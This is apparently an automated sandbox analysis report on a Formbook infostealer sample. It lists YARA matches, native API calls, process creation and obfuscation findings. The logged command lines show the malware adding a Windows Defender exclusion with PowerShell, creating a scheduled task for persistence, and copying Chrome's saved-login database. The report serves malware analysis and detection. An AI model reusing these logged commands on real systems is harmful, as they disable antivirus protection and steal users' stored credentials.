Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0096BA77 0_2_0096BA77
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_01344139 0_2_01344139
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_01344148 0_2_01344148
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0134EDF0 0_2_0134EDF0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0134EDE0 0_2_0134EDE0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0134DA1C 0_2_0134DA1C
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D4713 0_2_075D4713
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D85C0 0_2_075D85C0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D0040 0_2_075D0040
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D7970 0_2_075D7970
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D18D8 0_2_075D18D8
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D0006 0_2_075D0006
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07841398 0_2_07841398
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0784B848 0_2_0784B848
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07840F61 0_2_07840F61
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07840F70 0_2_07840F70
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07842580 0_2_07842580
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0784256F 0_2_0784256F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 8_2_002FBA77 8_2_002FBA77
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00401030 12_2_00401030
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0040927B 12_2_0040927B
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00409280 12_2_00409280
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0040DC20 12_2_0040DC20
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00402D8F 12_2_00402D8F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00402D90 12_2_00402D90
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D78F 12_2_0041D78F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00402FB0 12_2_00402FB0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041E7BB 12_2_0041E7BB
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0059BA77 12_2_0059BA77
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AD466 21_2_046AD466
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F841F 21_2_045F841F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B1D55 21_2_046B1D55
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B2D07 21_2_046B2D07
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E0D20 21_2_045E0D20
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B25DD 21_2_046B25DD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FD5E0 21_2_045FD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612581 21_2_04612581
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04606E30 21_2_04606E30
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AD616 21_2_046AD616
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B2EF7 21_2_046B2EF7
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B1FF1 21_2_046B1FF1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046BDFCE 21_2_046BDFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046BE824 21_2_046BE824
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A830 21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1002 21_2_046A1002
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B28EC 21_2_046B28EC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B20A8 21_2_046B20A8
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FB090 21_2_045FB090
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EF900 21_2_045EF900
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469FA2B 21_2_0469FA2B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B22AE 21_2_046B22AE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AB40 21_2_0460AB40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B2B28 21_2_046B2B28
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A03DA 21_2_046A03DA
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046ADBD2 21_2_046ADBD2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461ABD8 21_2_0461ABD8
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461EBB0 21_2_0461EBB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0060927B 21_2_0060927B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00609280 21_2_00609280
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0060DC20 21_2_0060DC20
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00602D8F 21_2_00602D8F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00602D90 21_2_00602D90
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00602FB0 21_2_00602FB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061E7BB 21_2_0061E7BB
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 045EB150 appears 87 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A310 NtCreateFile, 12_2_0041A310
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A3C0 NtReadFile, 12_2_0041A3C0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A440 NtClose, 12_2_0041A440
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A4F0 NtAllocateVirtualMemory, 12_2_0041A4F0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A30C NtCreateFile, 12_2_0041A30C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629540 NtReadFile,LdrInitializeThunk, 21_2_04629540
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046295D0 NtClose,LdrInitializeThunk, 21_2_046295D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk, 21_2_04629660
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629650 NtQueryValueKey,LdrInitializeThunk, 21_2_04629650
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629610 NtEnumerateValueKey,LdrInitializeThunk, 21_2_04629610
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk, 21_2_046296E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046296D0 NtCreateKey,LdrInitializeThunk, 21_2_046296D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629710 NtQueryInformationToken,LdrInitializeThunk, 21_2_04629710
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629FE0 NtCreateMutant,LdrInitializeThunk, 21_2_04629FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629780 NtMapViewOfSection,LdrInitializeThunk, 21_2_04629780
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629860 NtQuerySystemInformation,LdrInitializeThunk, 21_2_04629860
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629840 NtDelayExecution,LdrInitializeThunk, 21_2_04629840
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk, 21_2_04629910
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046299A0 NtCreateSection,LdrInitializeThunk, 21_2_046299A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A50 NtCreateFile,LdrInitializeThunk, 21_2_04629A50
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629560 NtWriteFile, 21_2_04629560
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629520 NtWaitForSingleObject, 21_2_04629520
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462AD30 NtSetContextThread, 21_2_0462AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046295F0 NtQueryInformationFile, 21_2_046295F0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629670 NtQueryInformationProcess, 21_2_04629670
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629760 NtOpenProcess, 21_2_04629760
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462A770 NtOpenThread, 21_2_0462A770
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629770 NtSetInformationFile, 21_2_04629770
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629730 NtQueryVirtualMemory, 21_2_04629730
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462A710 NtOpenProcessToken, 21_2_0462A710
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046297A0 NtUnmapViewOfSection, 21_2_046297A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462B040 NtSuspendThread, 21_2_0462B040
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629820 NtEnumerateKey, 21_2_04629820
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046298F0 NtReadVirtualMemory, 21_2_046298F0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046298A0 NtWriteVirtualMemory, 21_2_046298A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629950 NtQueueApcThread, 21_2_04629950
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046299D0 NtCreateProcessEx, 21_2_046299D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A20 NtResumeThread, 21_2_04629A20
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A00 NtProtectVirtualMemory, 21_2_04629A00
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A10 NtQuerySection, 21_2_04629A10
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A80 NtOpenDirectoryObject, 21_2_04629A80
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629B00 NtSetValueKey, 21_2_04629B00
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462A3B0 NtGetContextThread, 21_2_0462A3B0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A310 NtCreateFile, 21_2_0061A310
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A3C0 NtReadFile, 21_2_0061A3C0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A440 NtClose, 21_2_0061A440
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A4F0 NtAllocateVirtualMemory, 21_2_0061A4F0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A30C NtCreateFile, 21_2_0061A30C
Sample file is different than original file name gathered from version info
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.301765758.00000000075A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.294702301.0000000000962000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.301821423.0000000007770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000008.00000000.287142892.00000000002F2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000000.292903741.0000000000592000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.369531505.0000000002EC5000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.369137494.00000000012DF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000003.296040440.0000000000FB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000003.293928699.0000000000E0C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dDqpEdJEtzi.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: iuvRyl9i7D.exe Virustotal: Detection: 23%
Source: iuvRyl9i7D.exe ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File read: C:\Users\user\Desktop\iuvRyl9i7D.exe Jump to behavior
Source: iuvRyl9i7D.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe "C:\Users\user\Desktop\iuvRyl9i7D.exe"
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File created: C:\Users\user\AppData\Local\Temp\tmp280F.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/9@7/6
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01
Source: iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 2017 JIYUKOBO Ltd. All Rights Reserved.slnt
Source: iuvRyl9i7D.exe String found in binary or memory: BatchTabLayout#tableLayoutPanel4+ProcessEndOfDayButton!!ProcessEndOfDay1LoadTruckRouteFileButton'!LoadTruckRouteFile3LoadTruckDriverFileButton)!LoadTruckDriverFileOLoadOverallInventoryExtensionFileButtonE!LoadOverallInventoryExtensionFile=LoadOverallInventoryFileButton3!LoadOverallInventoryFile9LoadTruckInventoryFileButton/!LoadTruckInventoryFile/LoadTruckFuelFileButton%!LoadTruckFuelFile'LoadTruckFileButton
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: iuvRyl9i7D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: iuvRyl9i7D.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
